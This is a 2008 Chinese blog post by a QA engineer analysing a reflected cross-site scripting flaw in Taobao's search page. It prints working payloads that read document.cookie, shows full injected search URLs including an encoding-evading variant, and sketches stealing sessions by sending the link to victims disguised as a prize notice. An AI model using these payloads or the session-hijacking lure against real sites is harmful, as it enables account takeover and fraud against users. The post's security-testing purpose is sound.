【工作经历:阿里巴巴搜索技术研发中心QA ,百度新产品测试部QA】
【领域:测试分析,自动化测试,性能测试,安全测试 】
【个人定位:高级测试工程师+培训师+领域产品专家】
淘宝xss的简单分析
上一篇 /
下一篇 2008-08-15 18:27:19
/ 个人分类:安全测试
bzcyer提到了一个淘宝的xss问题。
帖子的地址
http://bbs.51testing.com/thread-123477-1-1.html
感觉很有意思,淘宝竟然连基本的xss符号都没有过滤。
这是作者的原来的xss测试语句。
>"'><img src=javascript:alert(21879)>
简单修改一下
>"'><img src=javascript:alert(document.cookie)>
监听http发送请求的过程。
原始的正常请求
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=xxxxxxxxxx&cat=&productCat=1&book_search=fuzzy_sr_all_text
修改请求为xss攻击语句。
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascript:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
没有成功,呵呵。
忘记http请求会修改编码的,修正一下
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascrīpt:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text
这样就已经可以达到xss了。
下一步就是黑客的做法了。
修改xss语句为获取cookie,然后使用sessionIE,就可以操纵他的cookie了。因为快下班了。所以,没有时间继续研究了。如果深挖,可能会有更多的应用。
以后再研究,给一个完整利用的方法。我不知道淘宝会不会有什么限制,比如即使获得session,仍然无法登陆对方的帐户。这就不得而知了。试验一下才知道。
如果可以的话,利用起来就是欺骗了。
将以上的xss连接发送给别人,说是中将之类的,别人点击之后,就会截获他的session,进行一些操作了。
除非,淘宝做了闲置,否则,这是一个明显的漏洞和bug。
相关阅读:
- Web安全测试 (breezeforever, 2008-5-21)
- 2007十大Web安全漏洞 跨站脚本攻击XSS居首 (breezeforever, 2008-5-26)
- 连载:(十一)软件测试技术——安全性测试 (51testing, 2008-6-18)
- IPv6安全性问题 (caption, 2008-7-02)
- 如何评测软件系统的安全性 (风在吹, 2008-7-07)
- 【转】在网站测试中如何做好安全性测试? (gzmandy, 2008-7-11)
- Open API测试畅想 (liangjz, 2008-7-28)
- OpenAPI 测试畅想 (qaarchitech, 2008-7-28)
- web安全测试-跨站点脚本攻击 (Kingson, 2008-8-02)
- 狡猾病毒伪装杀毒软件 骗网友上网购买 (caption, 2008-8-11)
收藏
举报
TAG:
安全测试